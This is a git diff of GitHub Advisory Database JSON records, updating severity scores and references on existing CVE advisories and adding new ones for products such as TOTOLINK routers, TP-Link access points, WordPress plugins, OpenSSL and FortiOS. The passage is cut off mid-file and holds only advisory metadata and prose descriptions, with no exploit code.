a/advisories/unreviewed/2024/03/GHSA-mqr3-mxfg-8rw7/GHSA-mqr3-mxfg-8rw7.json +++ b/advisories/unreviewed/2024/03/GHSA-mqr3-mxfg-8rw7/GHSA-mqr3-mxfg-8rw7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mqr3-mxfg-8rw7", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42892" ], "details": "A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A local attacker may be able to elevate their privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:07Z" diff --git a/advisories/unreviewed/2024/03/GHSA-mrx6-42xr-335p/GHSA-mrx6-42xr-335p.json b/advisories/unreviewed/2024/03/GHSA-mrx6-42xr-335p/GHSA-mrx6-42xr-335p.json index fc7d3f8ced7..1ce8fff4c03 100644 --- a/advisories/unreviewed/2024/03/GHSA-mrx6-42xr-335p/GHSA-mrx6-42xr-335p.json +++ b/advisories/unreviewed/2024/03/GHSA-mrx6-42xr-335p/GHSA-mrx6-42xr-335p.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrx6-42xr-335p", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-40390" ], "details": "A privacy issue was addressed by moving sensitive data to a protected location. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:07Z" diff --git a/advisories/unreviewed/2024/03/GHSA-ph5r-c8gc-xg6f/GHSA-ph5r-c8gc-xg6f.json b/advisories/unreviewed/2024/03/GHSA-ph5r-c8gc-xg6f/GHSA-ph5r-c8gc-xg6f.json index 6490d838383..cd71de3ae0f 100644 --- a/advisories/unreviewed/2024/03/GHSA-ph5r-c8gc-xg6f/GHSA-ph5r-c8gc-xg6f.json +++ b/advisories/unreviewed/2024/03/GHSA-ph5r-c8gc-xg6f/GHSA-ph5r-c8gc-xg6f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ph5r-c8gc-xg6f", - "modified": "2024-04-03T15:30:41Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-03-21T12:31:56Z", "aliases": [ "CVE-2024-26643" @@ -18,6 +18,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26643" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/291cca35818bd52a407bc37ab45a15816039e363" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/406b0241d0eb598a0b330ab20ae325537d8d8163" diff --git a/advisories/unreviewed/2024/03/GHSA-px7f-qj7m-m4v6/GHSA-px7f-qj7m-m4v6.json b/advisories/unreviewed/2024/03/GHSA-px7f-qj7m-m4v6/GHSA-px7f-qj7m-m4v6.json index b6f28d65fcd..f55494e745f 100644 --- a/advisories/unreviewed/2024/03/GHSA-px7f-qj7m-m4v6/GHSA-px7f-qj7m-m4v6.json +++ b/advisories/unreviewed/2024/03/GHSA-px7f-qj7m-m4v6/GHSA-px7f-qj7m-m4v6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-px7f-qj7m-m4v6", - "modified": "2024-03-27T21:30:47Z", + "modified": "2024-04-07T12:31:03Z", "published": "2024-03-27T21:30:47Z", "aliases": [ "CVE-2024-28085" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://github.com/skyler-ferrante/CVE-2024-28085" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00005.html" + }, { "type": "WEB", "url": "https://mirrors.edge.kernel.org/pub/linux/utils/util-linux" diff --git a/advisories/unreviewed/2024/03/GHSA-qw7q-x9r6-v6fr/GHSA-qw7q-x9r6-v6fr.json b/advisories/unreviewed/2024/03/GHSA-qw7q-x9r6-v6fr/GHSA-qw7q-x9r6-v6fr.json index 65eb33be9ae..8f4837a9133 100644 --- a/advisories/unreviewed/2024/03/GHSA-qw7q-x9r6-v6fr/GHSA-qw7q-x9r6-v6fr.json +++ b/advisories/unreviewed/2024/03/GHSA-qw7q-x9r6-v6fr/GHSA-qw7q-x9r6-v6fr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qw7q-x9r6-v6fr", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42893" ], "details": "A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. An app may be able to access protected user data.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -51,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:07Z" diff --git a/advisories/unreviewed/2024/03/GHSA-r9x8-r5r4-mq7c/GHSA-r9x8-r5r4-mq7c.json b/advisories/unreviewed/2024/03/GHSA-r9x8-r5r4-mq7c/GHSA-r9x8-r5r4-mq7c.json index a6f993d8bfa..d84f9af506f 100644 --- a/advisories/unreviewed/2024/03/GHSA-r9x8-r5r4-mq7c/GHSA-r9x8-r5r4-mq7c.json +++ b/advisories/unreviewed/2024/03/GHSA-r9x8-r5r4-mq7c/GHSA-r9x8-r5r4-mq7c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r9x8-r5r4-mq7c", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42931" ], "details": "The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. A process may gain admin privileges without proper authentication.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:08Z" diff --git a/advisories/unreviewed/2024/03/GHSA-vpp6-9fcm-rv58/GHSA-vpp6-9fcm-rv58.json b/advisories/unreviewed/2024/03/GHSA-vpp6-9fcm-rv58/GHSA-vpp6-9fcm-rv58.json index 2f0cea20888..a35a5fb5f86 100644 --- a/advisories/unreviewed/2024/03/GHSA-vpp6-9fcm-rv58/GHSA-vpp6-9fcm-rv58.json +++ b/advisories/unreviewed/2024/03/GHSA-vpp6-9fcm-rv58/GHSA-vpp6-9fcm-rv58.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vpp6-9fcm-rv58", - "modified": "2024-03-29T18:30:42Z", + "modified": "2024-04-05T18:30:33Z", "published": "2024-03-29T18:30:42Z", "aliases": [ "CVE-2023-49231" @@ -29,6 +29,10 @@ { "type": "WEB", "url": "https://www.visual-planning.com/en/support-portal/updates" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Apr/1" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/03/GHSA-x66g-5578-7px9/GHSA-x66g-5578-7px9.json b/advisories/unreviewed/2024/03/GHSA-x66g-5578-7px9/GHSA-x66g-5578-7px9.json index 73b97d91053..71819717a19 100644 --- a/advisories/unreviewed/2024/03/GHSA-x66g-5578-7px9/GHSA-x66g-5578-7px9.json +++ b/advisories/unreviewed/2024/03/GHSA-x66g-5578-7px9/GHSA-x66g-5578-7px9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x66g-5578-7px9", - "modified": "2024-03-13T15:31:05Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-03-13T15:31:05Z", "aliases": [ "CVE-2024-26629" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c6f8b3fcc62725e4129f2c0fd550d022d4a7685a" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03" diff --git a/advisories/unreviewed/2024/03/GHSA-x9pr-7qrq-58vq/GHSA-x9pr-7qrq-58vq.json b/advisories/unreviewed/2024/03/GHSA-x9pr-7qrq-58vq/GHSA-x9pr-7qrq-58vq.json index 585f1ece98e..15e04c89463 100644 --- a/advisories/unreviewed/2024/03/GHSA-x9pr-7qrq-58vq/GHSA-x9pr-7qrq-58vq.json +++ b/advisories/unreviewed/2024/03/GHSA-x9pr-7qrq-58vq/GHSA-x9pr-7qrq-58vq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x9pr-7qrq-58vq", - "modified": "2024-03-29T18:30:42Z", + "modified": "2024-04-05T18:30:33Z", "published": "2024-03-29T18:30:42Z", "aliases": [ "CVE-2023-49232" @@ -29,6 +29,10 @@ { "type": "WEB", "url": "https://www.visual-planning.com/en/support-portal/updates" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Apr/2" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/03/GHSA-xcwm-wrf2-369r/GHSA-xcwm-wrf2-369r.json b/advisories/unreviewed/2024/03/GHSA-xcwm-wrf2-369r/GHSA-xcwm-wrf2-369r.json index 888160ad43c..ec42693e1f4 100644 --- a/advisories/unreviewed/2024/03/GHSA-xcwm-wrf2-369r/GHSA-xcwm-wrf2-369r.json +++ b/advisories/unreviewed/2024/03/GHSA-xcwm-wrf2-369r/GHSA-xcwm-wrf2-369r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xcwm-wrf2-369r", - "modified": "2024-03-28T18:30:46Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-03-28T18:30:46Z", "aliases": [ "CVE-2023-42896" ], "details": "An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Sonoma 14.2. An app may be able to modify protected parts of the file system.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -43,7 +46,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-03-28T16:15:07Z" diff --git a/advisories/unreviewed/2024/04/GHSA-222x-r452-4688/GHSA-222x-r452-4688.json b/advisories/unreviewed/2024/04/GHSA-222x-r452-4688/GHSA-222x-r452-4688.json new file mode 100644 index 00000000000..55a9ccf7b77 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-222x-r452-4688/GHSA-222x-r452-4688.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-222x-r452-4688", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52359" + ], + "details": "Vulnerability of permission verification in some APIs in the ActivityTaskManagerService module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52359" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-225x-44w7-hh2f/GHSA-225x-44w7-hh2f.json b/advisories/unreviewed/2024/04/GHSA-225x-44w7-hh2f/GHSA-225x-44w7-hh2f.json new file mode 100644 index 00000000000..e17e2a35a53 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-225x-44w7-hh2f/GHSA-225x-44w7-hh2f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-225x-44w7-hh2f", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:35Z", + "aliases": [ + "CVE-2024-31851" + ], + "details": "A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31851" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-09" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-23c8-jrp9-f2v5/GHSA-23c8-jrp9-f2v5.json b/advisories/unreviewed/2024/04/GHSA-23c8-jrp9-f2v5/GHSA-23c8-jrp9-f2v5.json new file mode 100644 index 00000000000..57c32ec2290 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-23c8-jrp9-f2v5/GHSA-23c8-jrp9-f2v5.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23c8-jrp9-f2v5", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31808" + ], + "details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the webWlanIdx parameter in the setWebWlanIdx function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31808" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/CI_3_setWebWlanIdx/CI.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-23gq-p5v8-4xh3/GHSA-23gq-p5v8-4xh3.json b/advisories/unreviewed/2024/04/GHSA-23gq-p5v8-4xh3/GHSA-23gq-p5v8-4xh3.json new file mode 100644 index 00000000000..3d361f9ba52 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-23gq-p5v8-4xh3/GHSA-23gq-p5v8-4xh3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23gq-p5v8-4xh3", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49912" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `profile` parameter at offset `0x4224b0` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49912" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-2726-6rmv-hf9g/GHSA-2726-6rmv-hf9g.json b/advisories/unreviewed/2024/04/GHSA-2726-6rmv-hf9g/GHSA-2726-6rmv-hf9g.json new file mode 100644 index 00000000000..dafdd0ccab1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-2726-6rmv-hf9g/GHSA-2726-6rmv-hf9g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2726-6rmv-hf9g", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2423" + ], + "details": "The UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2423" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/userswp/trunk/widgets/user-title.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/userswp/tags/1.2.6&old=3051240&new_path=/userswp/tags/1.2.7&new=3051240&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ef53c2c-01fb-41b6-b329-d952ce3424e8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-27p7-7mgq-m3v8/GHSA-27p7-7mgq-m3v8.json b/advisories/unreviewed/2024/04/GHSA-27p7-7mgq-m3v8/GHSA-27p7-7mgq-m3v8.json new file mode 100644 index 00000000000..1e4f5446e64 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-27p7-7mgq-m3v8/GHSA-27p7-7mgq-m3v8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-27p7-7mgq-m3v8", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-31924" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Exactly WWW EWWW Image Optimizer.This issue affects EWWW Image Optimizer: from n/a through 7.2.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31924" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ewww-image-optimizer/wordpress-ewww-image-optimizer-plugin-7-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-28v2-9pc8-5rcq/GHSA-28v2-9pc8-5rcq.json b/advisories/unreviewed/2024/04/GHSA-28v2-9pc8-5rcq/GHSA-28v2-9pc8-5rcq.json new file mode 100644 index 00000000000..7c6b5123348 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-28v2-9pc8-5rcq/GHSA-28v2-9pc8-5rcq.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-28v2-9pc8-5rcq", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-3427" + ], + "details": "A vulnerability, which was classified as problematic, was found in SourceCodester Online Courseware 1.0. This affects an unknown part of the file addq.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259599.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3427" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-12.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259599" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259599" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311606" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-293q-jm6v-g4pw/GHSA-293q-jm6v-g4pw.json b/advisories/unreviewed/2024/04/GHSA-293q-jm6v-g4pw/GHSA-293q-jm6v-g4pw.json new file mode 100644 index 00000000000..fcde6f15f30 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-293q-jm6v-g4pw/GHSA-293q-jm6v-g4pw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-293q-jm6v-g4pw", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2306" + ], + "details": "The Revslider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via svg upload in all versions up to, and including, 6.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure revslider can be extended to authors.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2306" + }, + { + "type": "WEB", + "url": "https://www.sliderrevolution.com/documentation/changelog" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f6af1e90-9bad-470b-9e00-137000c0450c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-299c-jvhc-gxj8/GHSA-299c-jvhc-gxj8.json b/advisories/unreviewed/2024/04/GHSA-299c-jvhc-gxj8/GHSA-299c-jvhc-gxj8.json new file mode 100644 index 00000000000..3e93ee64d44 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-299c-jvhc-gxj8/GHSA-299c-jvhc-gxj8.json @@ -0,0 +1,51 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-299c-jvhc-gxj8", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-2511" + ], + "details": "Issue summary: Some non-default TLS server configurations can cause unbounded\nmemory growth when processing TLSv1.3 sessions\n\nImpact summary: An attacker may exploit certain server configurations to trigger\nunbounded memory growth that would lead to a Denial of Service\n\nThis problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is\nbeing used (but not if early_data support is also configured and the default\nanti-replay protection is in use). In this case, under certain conditions, the\nsession cache can get into an incorrect state and it will fail to flush properly\nas it fills. The session cache will continue to grow in an unbounded manner. A\nmalicious client could deliberately create the scenario for this failure to\nforce a Denial of Service. It may also happen by accident in normal operation.\n\nThis issue only affects TLS servers supporting TLSv1.3. It does not affect TLS\nclients.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. OpenSSL\n1.0.2 is also not affected by this issue.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2511" + }, + { + "type": "WEB", + "url": "https://github.com/openssl/openssl/commit/7e4d731b1c07201ad9374c1cd9ac5263bdf35bce" + }, + { + "type": "WEB", + "url": "https://github.com/openssl/openssl/commit/b52867a9f618bb955bed2a3ce3db4d4f97ed8e5d" + }, + { + "type": "WEB", + "url": "https://github.com/openssl/openssl/commit/e9d7083e241670332e0443da0f0d4ffb52829f08" + }, + { + "type": "WEB", + "url": "https://github.openssl.org/openssl/extended-releases/commit/5f8d25770ae6437db119dfc951e207271a326640" + }, + { + "type": "WEB", + "url": "https://www.openssl.org/news/secadv/20240408.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-29f2-7m5v-qfqv/GHSA-29f2-7m5v-qfqv.json b/advisories/unreviewed/2024/04/GHSA-29f2-7m5v-qfqv/GHSA-29f2-7m5v-qfqv.json new file mode 100644 index 00000000000..ef77f930169 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-29f2-7m5v-qfqv/GHSA-29f2-7m5v-qfqv.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29f2-7m5v-qfqv", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29751" + ], + "details": "In asn1_ec_pkey_parse_p384 of asn1_common.c, there is a possible OOB Read due to a missing null check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29751" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-29wp-xqwp-4vqr/GHSA-29wp-xqwp-4vqr.json b/advisories/unreviewed/2024/04/GHSA-29wp-xqwp-4vqr/GHSA-29wp-xqwp-4vqr.json new file mode 100644 index 00000000000..91e044fafbc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-29wp-xqwp-4vqr/GHSA-29wp-xqwp-4vqr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29wp-xqwp-4vqr", + "modified": "2024-04-09T15:30:38Z", + "published": "2024-04-09T15:30:38Z", + "aliases": [ + "CVE-2024-23662" + ], + "details": "An exposure of sensitive information to an unauthorized actor in Fortinet FortiOS at least version at least 7.4.0 through 7.4.1 and 7.2.0 through 7.2.5 and 7.0.0 through 7.0.15 and 6.4.0 through 6.4.15 allows attacker to information disclosure via HTTP requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23662" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-29x8-vr7f-rwm6/GHSA-29x8-vr7f-rwm6.json b/advisories/unreviewed/2024/04/GHSA-29x8-vr7f-rwm6/GHSA-29x8-vr7f-rwm6.json new file mode 100644 index 00000000000..5676767589f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-29x8-vr7f-rwm6/GHSA-29x8-vr7f-rwm6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": 